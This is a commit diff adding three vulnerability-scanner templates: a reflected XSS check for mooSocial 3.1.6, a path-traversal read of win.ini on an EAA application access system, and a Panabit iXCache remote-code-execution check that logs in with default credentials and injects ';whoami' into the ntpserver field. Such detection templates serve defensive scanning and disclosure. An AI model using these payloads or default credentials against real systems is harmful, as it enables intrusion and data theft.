Merge pull request #7889 from momika233/main

CVE-2023-4174/CVE-2023-4173/TerraMaster-RCE/panabit-ixcache-date-config-rce
2023-08-10 11:27:53 +05:30 · 2023-08-10 11:27:53 +05:30 · 864154f8a5
parent a5d72fedd3 6090a6efea
commit 864154f8a5
3 changed files with 139 additions and 0 deletions
--- a/http/cves/2023/CVE-2023-4174.yaml
+++ b/http/cves/2023/CVE-2023-4174.yaml
@ -0,0 +1,41 @@
+id: CVE-2023-4174
+
+info:
+  name: mooSocial 3.1.6 - Reflected Cross Site Scripting
+  author: momika233
+  severity: medium
+  description: |
+    A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.
+  reference:
+    - https://www.exploit-db.com/exploits/51671
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-4174
+    - https://packetstormsecurity.com/files/174017/Social-Commerce-3.1.6-Cross-Site-Scripting.html
+  metadata:
+    max-request: 5
+    verified: true
+    fofa-query: icon_hash="702863115"
+  tags: cve,cve2023,moosocial,xss
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/search/index?q="><img+src=a+onerror=alert(document.domain)>ridxm'
+      - '{{BaseURL}}/stores"><img+src=a+onerror=alert(document.domain)>ridxm/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent'
+      - '{{BaseURL}}/user_info"><img+src=a+onerror=alert(document.domain)>ridxm/index/friends'
+      - '{{BaseURL}}/faqs"><img+src=a+onerror=alert(document.domain)>ridxm/index?content_search="><img+src=a+onerror=alert(document.domain)>ridxm'
+      - '{{BaseURL}}/classifieds"><img+src=a+onerror=alert(document.domain)>ridxm/search?category=1'
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<img src=a onerror=alert(document.domain)>ridxm"
+          - "mooSocial"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
--- a/http/vulnerabilities/other/eaa-app-lfi.yaml
+++ b/http/vulnerabilities/other/eaa-app-lfi.yaml
@ -0,0 +1,41 @@
+id: eaa-app-lfi
+
+info:
+  name: EAA Application Access System - Arbitary File Read
+  author: momika233
+  severity: high
+  description: |
+    There is an arbitrary file reading vulnerability in the VA virtual application platform of Tingzhi Technology, through which an attacker can obtain sensitive information in the server.
+  reference:
+    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E9%9C%86%E6%99%BA%E7%A7%91%E6%8A%80%20VA%E8%99%9A%E6%8B%9F%E5%BA%94%E7%94%A8%E5%B9%B3%E5%8F%B0%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: body="EAA益和应用接入系统"
+  tags: eaa,lfi
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/octet-stream"
+          - "filename=win.ini"
+        condition: and
+
+      - type: status
+        status:
+          - 200
--- a/http/vulnerabilities/other/panabit-ixcache-rce.yaml
+++ b/http/vulnerabilities/other/panabit-ixcache-rce.yaml
@ -0,0 +1,57 @@
+id: panabit-ixcache-rce
+
+info:
+  name: Panabit iXCache date_config - Remote Code Execution
+  author: momika233
+  severity: critical
+  description: |
+    Panabit iXCache date_config module has command splicing, resulting in the execution of arbitrary commands.
+  reference:
+    - https://github.com/Threekiii/Awesome-POC/blob/master/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/Panabit%20iXCache%20date_config%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/Panabit/Panabit%20iXCache%20date_config%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    fofa-qeury: title="iXCache"
+    veified: true
+    max-request: 2
+  tags: panabit,rce,ixcache,intrusive
+
+http:
+  - raw:
+      - |
+        POST /login/userverify.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /cgi-bin/Maintain/date_config HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        ntpserver=0.0.0.0;whoami&year=2021&month=08&day=14&hour=17&minute=04&second=50&tz=Asiz&bcy=Shanghai&ifname=fxp1
+
+    cookie-reuse: true
+    attack: pitchfork
+
+    payloads:
+      username:
+        - admin
+      password:
+        - ixcache
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200